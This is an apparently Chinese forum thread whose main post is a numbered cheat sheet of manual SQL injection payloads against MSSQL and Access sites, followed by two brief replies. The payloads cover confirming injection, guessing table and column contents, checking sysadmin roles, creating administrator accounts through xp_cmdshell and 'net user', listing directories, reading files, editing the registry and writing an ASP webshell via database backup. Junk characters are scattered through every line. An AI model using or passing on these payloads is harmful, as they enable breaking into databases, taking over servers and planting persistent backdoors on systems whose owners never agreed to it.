社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4242阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 D!-zQ`^  
  2.初步判断是否是mssql ;and user>0 t=pG6U  
K E^_09  
  3.注入参数是字符'and [查询条件] and ''=' #?-W.  
U "}Kth  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' 1X{A}9nA  
JRNyvG>j  
  5.判断数据库系统 FIS-xpv$  
z* `81  
  ;and (select count(*) from sysobjects)>0 mssql ,fN iZ  
O+e8}Tmm  
  ;and (select count(*) from msysobjects)>0 access \ 0CGS  
`\qU.m0(j  
?ph"|LyL  
MKH7d/x  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 '1mygplW  
&?9.Y,  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 @9L%`=]b^  
*$s)p>  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 eHjR/MMr_  
[&39Yv.k,7  
  9.(1)猜字段的ascii值(access) q3I,3?_  
p]>bN  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 d82IEhZ#  
nyDqR#t  
  (2)猜字段的ascii值(mssql) ~{N|("nB  
7i'vAOnw^  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 v` B_xEl  
+I/P5OGRN  
  10.测试权限结构(mssql) aE;!mod  
^@)+P/&  
k!%HcU%J  
xWlB!r<}Gz  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ]]]7"a  
-x RsYYw  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- UIyOn` d"  
|M0TG  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- c#rbyx?5  
7IvCMb&%R  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 6qw_|A&g  
[Y:HVr,  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- - -]\z*x  
~#-`Qh  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- "zv+|_ZAfd  
$]hf2Yr(  
  ;and 1=(select IS_MEMBER('db_owner'));-- ))MP]j9 T  
fG.w;Aemv5  
NyGF57v[M  
bLUn0)c  
  11.添加mssql和系统的帐户 hMDyE.X-  
D_8hn3FH  
  ;exec master.dbo.sp_addlogin username;-- Jv7M[SJ#x  
  ;exec master.dbo.sp_password null,username,password;-- |Rl|Th  
u!X 2ju<  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- mq "p"iI  
A#p@`|H#B  
  ;exec master.dbo.xp_cmdshell 'net user username password 1%+0OmV&  
Llzowlfe  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- co12\,aD  
69L s"e  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- QKF2_Acc   
CBvBBt*  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- LyQO_mT2  
'DIE#l`  
85X^T]zo  
5 )C~L]  
  12.(1)遍历目录 TS%cTh'ItH  
[Z[)hUXE?  
  ;create table dirs(paths varchar(100), id int) >,9t<p=Q  
5G2u(hx  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' q`{.2yV  
UjfB+=7I{L  
  ;and (select top 1 paths from dirs)>0 J^?O] |  
>:K3y$]_  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) c1z5t]d   
N1SRnJu<f  
/ )EB~|4']  
v<-D>iJ  
  (2)遍历目录 |UBJu `%  
ROfmAc  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- O}%=c\Pb  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 _}\&;  
aRV!0?fS  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 qa Q  
n|F`6.G  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 .3Ap+V8?  
kBT cN D|  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 j9qN!.~mM  
b/G0EcRw+  
s}A]lY  
]~oM'?&!  
  13.mssql中的存储过程 Rp|:$5&nE  
"C.$qk]  
  xp_regenumvalues 注册表根键, 子键 _%>.t  
!]`]67lC  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 6 tzn% ?  
O8lOr(|l  
  xp_regread 根键,子键,键值名 SrKF\h%/+  
QoW3*1o  
  ;exec xp_regread H1@"Yg8  
FJD*A`a  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ,CdI.kV>o2  
zZy>XHR H  
  xp_regwrite 根键,子键, 值名, 值类型, 值 M\]E;C'"U  
DnTM#i:  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 [C&c;YNp  
I/(`<s p  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 81KtK[?b  
~7k b4[  
  xp_regdeletevalue 根键,子键,值名 1|%$ie  
7,jqA"9  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 7Jqp2\  
$~j]/U  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 [IYs4Y5  
HsXFglQ  
''(T3;^ +  
0 Hq$h  
  14.mssql的backup创建webshell 9 (&!>z  
kfHLjr.  
  use model Oll\T GXP!  
VOiphw`  
  create table cmd(str image); /q^( uWu  
E6US  
  insert into cmd(str) values (''); wg[*]_,a  
dzcPSbbpt  
  backup database model to disk='c:\l.asp'; '3xSzsDn  
x^ Wgo`v)  
~jPe9  
=*'` \}];"  
  15.mssql内置函数 M\GS&K$lq  
$pD^O!I)?  
  ;and (select @@version)>0 获得Windows的版本号 H@6  
eD/?$@y  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa EEaFi 8  
|GsLcUv6  
  ;and (select user_name())>0 爆当前系统的连接用户 Qejzp/2  
yZ2,AR%  
  ;and (select db_name())>0 得到当前连接的数据库 MdPwuXI  
lyT~>.?{  
!nd*U}q  
RS93_F8   
  16.简洁的webshell "'8$hV65.p  
vbWX`skU  
  use model ;^xku%u  
=EG[_i{r  
  create table cmd(str image); CR _A{(  
d2(n3Xf  
  insert into cmd(str) values (''); 2 o.Mh/D0  
KSexG:Xb  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八